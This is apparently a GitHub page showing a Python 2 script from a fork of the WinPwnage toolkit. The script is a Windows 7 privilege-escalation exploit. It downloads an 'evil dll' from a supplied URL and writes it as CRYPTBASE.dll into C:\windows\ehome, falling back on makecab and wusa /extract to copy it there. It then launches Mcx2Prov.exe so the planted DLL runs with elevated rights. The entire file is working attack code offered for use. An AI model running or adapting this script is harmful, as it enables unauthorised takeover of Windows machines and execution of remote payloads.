forked from rootm0s/WinPwnage
/
mcx2prov_dll_hijack.py
61 lines (56 loc) 路 1.78 KB
/
mcx2prov_dll_hijack.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
"""
https://www.greyhathacker.net/?p=796
* Windows 7
Executable:
C:\windows\ehome\Mcx2Prov.exe
Loads:
C:\Windows\ehome\CRYPTBASE.dll
Checks if Mcx2Prov.exe is present in \windows\ehome\ folder, if True
continue by checking if the dll file exists. If false, continue by
attempting to download the evil dll file to \windows\ehome\ folder
if fail, we attempt to use makecab and wusa to copy our dll. After
the copy is done, we execute the executable and enjoys the elevated
access
"""
import os
import sys
import requests
import win32api
import win32con
def mcx2prov_dll_hijack(url):
if (os.path.isfile(os.path.join("c:\windows\ehome\Mcx2Prov.exe")) == True):
if (os.path.isfile(os.path.join("c:\windows\ehome\CRYPTBASE.dll")) == False):
try:
download = requests.get(url)
if (len(download.content) > 1):
with open(os.path.join("c:\windows\ehome\CRYPTBASE.dll"),"wb") as dll:
dll.write(download.content)
dll.close()
if (os.path.isfile(os.path.join("c:\windows\ehome\CRYPTBASE.dll")) == True):
try:
win32api.ShellExecute(0,None,"c:\windows\ehome\Mcx2Prov.exe",None,None,win32con.SW_SHOW)
except Exception as error:
return False
else:
try:
makecab = os.popen("makecab CRYPTBASE.dll CRYPTBASE.tmp")
except Exception as error:
return False
try:
wusa = os.popen("wusa CRYPTBASE.tmp /extract:c:\windows\ehome")
except Exception as error:
return False
try:
print os.remove("CRYPTBASE.tmp")
except Exception as error:
return False
try:
win32api.ShellExecute(0,None,"c:\windows\ehome\Mcx2Prov.exe",None,None,win32con.SW_SHOW)
except Exception as error:
return False
else:
return False
except Exception as error:
return False
else:
sys.exit()